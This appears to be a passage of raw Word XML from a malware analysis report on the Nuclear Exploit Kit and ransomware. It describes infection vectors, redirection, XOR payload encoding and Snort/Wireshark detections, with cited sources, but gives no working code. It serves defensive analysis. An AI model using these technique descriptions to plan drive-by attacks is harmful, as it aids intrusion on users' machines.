      </w:r>
    </w:p>
    <w:p w14:paraId="1DDACF75" w14:textId="77777777" w:rsidR="00FB49BA" w:rsidRDefault="00955F57" w:rsidP="00FB49BA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>These families would provide the victims with decryption keys after receiving a payment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E556FE0" w14:textId="77777777" w:rsidR="00A55CFB" w:rsidRPr="00A55CFB" w:rsidRDefault="00A55CFB" w:rsidP="00A55CFB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Sources:  </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.f-secure.com/documents/996508/1030743/Threat_Report_2015.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00955F57">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00955F57">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.f-secure.com/v-descs/trojan_w32_cryptowall.shtml</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00955F57">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="002D0AAC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.symantec.com/security-center/writeup/2014-061923-2824-99</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5EB1E34D" w14:textId="77777777" w:rsidR="00FB49BA" w:rsidRDefault="00FB49BA" w:rsidP="00BF2E60">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6969F5C9" w14:textId="77777777" w:rsidR="00FB49BA" w:rsidRPr="00A55CFB" w:rsidRDefault="00FB49BA" w:rsidP="00BF2E60">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A55CFB">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>NUCLEAR EK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210700AE" w14:textId="77777777" w:rsidR="00BF2E60" w:rsidRDefault="00FB49BA" w:rsidP="00BF2E60">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">The exploit was performed by Nuclear Exploit Kit (EK).  </w:t>
      </w:r>
      <w:r w:rsidR="00FB11ED">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Nuclear has </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FB11ED">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>mutliple</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FB11ED">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> vectors including Flash, Silverlight, PDF, and Internet Explorer.  It also has multiple attack methods for re-directing users to a landing page containing the EK including compromised ad servers, drive-by downloads, and code injection.  </w:t>
      </w:r>
      <w:r w:rsidR="00FD079E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Nuclear also uses ASCII strings to XOR the payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B1D2D4" w14:textId="77777777" w:rsidR="00C52DF2" w:rsidRDefault="00C52DF2" w:rsidP="00BF2E60">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Behaviors observed that resemble a Nuclear EK malware </w:t>
      </w:r>
      <w:r w:rsidR="00FB11ED">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>A drive-by exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F1CAA8" w14:textId="77777777" w:rsidR="00C52DF2" w:rsidRDefault="00C52DF2" w:rsidP="00C52DF2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">A drive-by exploit </w:t>
      </w:r>
      <w:r w:rsidR="00FB11ED" w:rsidRPr="00C52DF2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">on both Flash and Silverlight </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>was</w:t>
      </w:r>
      <w:r w:rsidR="00FB11ED" w:rsidRPr="00C52DF2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> detected per Snort</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF87F59" w14:textId="77777777" w:rsidR="00FD079E" w:rsidRDefault="00C52DF2" w:rsidP="00C52DF2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">An exploit on both Flash and Silverlight was detected </w:t>
      </w:r>
      <w:r w:rsidR="00FB11ED" w:rsidRPr="00C52DF2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">by packet analysis in Wireshark.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3A5DE4" w14:textId="77777777" w:rsidR="00FD079E" w:rsidRDefault="00FB11ED" w:rsidP="00C52DF2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C52DF2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Redirection was used per Snort</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C309E29" w14:textId="77777777" w:rsidR="00FD079E" w:rsidRDefault="00FD079E" w:rsidP="00C52DF2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00FB11ED" w:rsidRPr="00C52DF2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">ultiple redirections were identified in Wireshark, including one to a landing page that appeared to launch the exploit on both Flash and Silverlight.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70307CC8" w14:textId="77777777" w:rsidR="00FB11ED" w:rsidRDefault="00FD079E" w:rsidP="00C52DF2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>An</w:t>
      </w:r>
      <w:r w:rsidR="00FB11ED" w:rsidRPr="00C52DF2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> ASCII string </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">that appeared </w:t>
      </w:r>
      <w:r w:rsidR="00FB11ED" w:rsidRPr="00C52DF2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>to XOR the payload was observed in multiple packets in Wireshark.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F300875" w14:textId="77777777" w:rsidR="00A55CFB" w:rsidRPr="00C52DF2" w:rsidRDefault="00A55CFB" w:rsidP="00C52DF2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Trojan:JS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Redirector.FD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> active redirector in 2015, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Trojan:SWF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Redirector.EW</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> used on sites using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="40C13776" w14:textId="77777777" w:rsidR="00FB11ED" w:rsidRDefault="00C029DF" w:rsidP="00BF2E60">
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Sources</w:t>
      </w:r>
      <w:r w:rsidR="00FB11ED">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">:  </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00FB11ED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://blog.malwarebytes.com/threats/nuclear/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00FB11ED">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00FB11ED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://isc.sans.edu/forums/diary/Nuclear+EK+traffic+patterns+in+August+2015/20001/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00FB11ED">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="002C35F9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/exploits-malware</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4F79843B" w14:textId="77777777" w:rsidR="00F90012" w:rsidRDefault="00F90012" w:rsidP="000A517A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:color w:val="355A79"/>
          <w:spacing w:val="8"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EAEAEA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03D2A786" w14:textId="77777777" w:rsidR="00F90012" w:rsidRDefault="00F90012" w:rsidP="000A517A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:color w:val="355A79"/>
          <w:spacing w:val="8"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EAEAEA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43717C39" w14:textId="77777777" w:rsidR="00F90012" w:rsidRDefault="00F90012" w:rsidP="000A517A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:color w:val="355A79"/>
          <w:spacing w:val="8"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EAEAEA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73B7678D" w14:textId="77777777" w:rsidR="00F824AC" w:rsidRDefault="00F824AC" w:rsidP="000A517A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:color w:val="355A79"/>
          <w:spacing w:val="8"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EAEAEA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E0C8C0C" w14:textId="77777777" w:rsidR="00F824AC" w:rsidRDefault="00F824AC" w:rsidP="000A517A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:color w:val="355A79"/>
          <w:spacing w:val="8"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EAEAEA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2265A411" w14:textId="77777777" w:rsidR="00F824AC" w:rsidRDefault="00F824AC" w:rsidP="000A517A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:color w:val="355A79"/>
          <w:spacing w:val="8"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EAEAEA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3053F5BF" w14:textId="77777777" w:rsidR="00F824AC" w:rsidRDefault="00F824AC" w:rsidP="000A517A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:color w:val="355A79"/>
          <w:spacing w:val="8"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EAEAEA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20076480" w14:textId="77777777" w:rsidR="00F824AC" w:rsidRDefault="00F824AC" w:rsidP="000A517A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:color w:val="355A79"/>
          <w:spacing w:val="8"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EAEAEA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56A73A3F" w14:textId="77777777" w:rsidR="00F824AC" w:rsidRDefault="00F824AC" w:rsidP="000A517A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:color w:val="355A79"/>
          <w:spacing w:val="8"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EAEAEA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6872621E" w14:textId="77777777" w:rsidR="00F824AC" w:rsidRDefault="00F824AC" w:rsidP="000A517A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:color w:val="355A79"/>
          <w:spacing w:val="8"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EAEAEA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="072B13EF" w14:textId="77777777" w:rsidR="00F90012" w:rsidRDefault="00F90012" w:rsidP="000A517A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:color w:val="355A79"/>
          <w:spacing w:val="8"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EAEAEA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AA8750B" w14:textId="77777777" w:rsidR="00F90012" w:rsidRDefault="00F90012" w:rsidP="000A517A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:color w:val="355A79"/>
          <w:spacing w:val="8"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EAEAEA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B9EE9D5" w14:textId="77777777" w:rsidR="00F824AC" w:rsidRPr="00F824AC" w:rsidRDefault="00F90012" w:rsidP="00A76618">
      <w:pPr>
        <w:pStyle w:val="NoSpacing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Lucida Console" w:hAnsi="Lucida Console"/>
          <w:color w:val="355A79"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7D6B1E" w14:textId="77777777" w:rsidR="00F824AC" w:rsidRPr="00F90012" w:rsidRDefault="00F824AC" w:rsidP="00F824AC">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Semilight" w:hAnsi="Segoe UI Semilight" w:cs="Segoe UI Semilight"/>
          <w:color w:val="414042"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00F824AC" w:rsidRPr="00F90012" w:rsidSect="004E7F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158E4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BD3C1A00"/>
    <w:lvl w:ilvl="0" w:tplc="23B66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BAD1E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24177"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="40404754"/>
    <w:lvl w:ilvl="0" w:tplc="46A20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23C67"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4964E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054F1F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="49269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64C89"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B32A0432"/>
    <w:lvl w:ilvl="0" w:tplc="04090005">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="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1F3A36BC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E1003E8C"/>
    <w:lvl w:ilvl="0" w:tplc="8708CF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07D0236"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="00AC2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92C66"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BD66A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F45D2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="622CC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07B89"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ED022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2735457F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="97A665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D62F6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6F9627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C1E6C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8FD2D1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68357A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="998E87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BA74C9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AD146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D23B9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FF342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B46BA2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CC5A4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8D67D0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CF4C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8B515D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="85546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0BAD1E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3151DF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="22C2EE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23740F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D0EC8A84"/>
    <w:lvl w:ilvl="0" w:tplc="23B66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C71E03"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7A8823DC"/>
    <w:lvl w:ilvl="0" w:tplc="3140C7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3C36375"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B212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104C0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AEDCAEA2"/>
    <w:lvl w:ilvl="0" w:tplc="80BAD1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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="490E6905"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="79B47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E064D4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D3A2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C85AFA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="01A203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606A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="72C8D3C6"/>
    <w:lvl w:ilvl="0" w:tplc="46A20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796DB0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="30A492FA"/>
    <w:lvl w:ilvl="0" w:tplc="461C25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3638A7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="299E0712"/>
    <w:lvl w:ilvl="0" w:tplc="80BAD1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F5644C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F2C4D5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D73B10"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="03BA46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261558"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C7E06C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E25E9B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7C1A8C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7357A1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="08783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EE3BBB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8192643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7F7627"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9432E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"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="30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70"/>
    <w:rsid w:val="000011A5"/>
    <w:rsid w:val="00001B13"/>
    <w:rsid w:val="00002694"/>
    <w:rsid w:val="000140B4"/>
    <w:rsid w:val="00014EFC"/>
    <w:rsid w:val="0002452D"/>
    <w:rsid w:val="000653EB"/>
    <w:rsid w:val="000668B0"/>
    <w:rsid w:val="0007460A"/>
    <w:rsid w:val="00090880"/>
    <w:rsid w:val="000A517A"/>
    <w:rsid w:val="000E78E6"/>
    <w:rsid w:val="000F4B9D"/>
    <w:rsid w:val="000F75A5"/>
    <w:rsid w:val="001057C7"/>
    <w:rsid w:val="00106B9D"/>
    <w:rsid w:val="00121205"/>
    <w:rsid w:val="001223C5"/>
    <w:rsid w:val="00127F99"/>
    <w:rsid w:val="001331DF"/>
    <w:rsid w:val="00141D37"/>
    <w:rsid w:val="00153A33"/>
    <w:rsid w:val="0015660F"/>
    <w:rsid w:val="00162FF6"/>
    <w:rsid w:val="00163A68"/>
    <w:rsid w:val="001714EB"/>
    <w:rsid w:val="001967D0"/>
    <w:rsid w:val="001E304D"/>
    <w:rsid w:val="001E3771"/>
    <w:rsid w:val="001F4844"/>
    <w:rsid w:val="002038E5"/>
    <w:rsid w:val="00203BC7"/>
    <w:rsid w:val="00205BFA"/>
    <w:rsid w:val="00211AFD"/>
    <w:rsid w:val="00212860"/>
    <w:rsid w:val="00221CE1"/>
    <w:rsid w:val="00222C1F"/>
    <w:rsid w:val="00233143"/>
    <w:rsid w:val="0023531F"/>
    <w:rsid w:val="002413FB"/>
    <w:rsid w:val="00241672"/>
    <w:rsid w:val="002464C1"/>
    <w:rsid w:val="002532E3"/>
    <w:rsid w:val="002570C9"/>
    <w:rsid w:val="00281329"/>
    <w:rsid w:val="00294D2E"/>
    <w:rsid w:val="002B7B55"/>
    <w:rsid w:val="002C1062"/>
    <w:rsid w:val="002C35F9"/>
    <w:rsid w:val="002D0AAC"/>
    <w:rsid w:val="002D1F3B"/>
    <w:rsid w:val="002E0150"/>
    <w:rsid w:val="002E0653"/>
    <w:rsid w:val="002E28EB"/>
    <w:rsid w:val="002E45FA"/>
    <w:rsid w:val="002F0D96"/>
    <w:rsid w:val="00300528"/>
    <w:rsid w:val="003210AF"/>
    <w:rsid w:val="00352C42"/>
    <w:rsid w:val="003739BE"/>
    <w:rsid w:val="0038678D"/>
    <w:rsid w:val="003A55D1"/>
    <w:rsid w:val="003A791A"/>
    <w:rsid w:val="003B5188"/>
    <w:rsid w:val="003C1DAD"/>
    <w:rsid w:val="003C1DFC"/>
    <w:rsid w:val="003C2C10"/>
    <w:rsid w:val="003C3DB9"/>
    <w:rsid w:val="003D50A3"/>
    <w:rsid w:val="003E0B02"/>
    <w:rsid w:val="004110E3"/>
    <w:rsid w:val="00414EBB"/>
    <w:rsid w:val="004278FF"/>
    <w:rsid w:val="004341C6"/>
    <w:rsid w:val="00441F25"/>
    <w:rsid w:val="00444908"/>
    <w:rsid w:val="0044524F"/>
    <w:rsid w:val="0045342A"/>
    <w:rsid w:val="00464842"/>
    <w:rsid w:val="004651B9"/>
    <w:rsid w:val="0048145D"/>
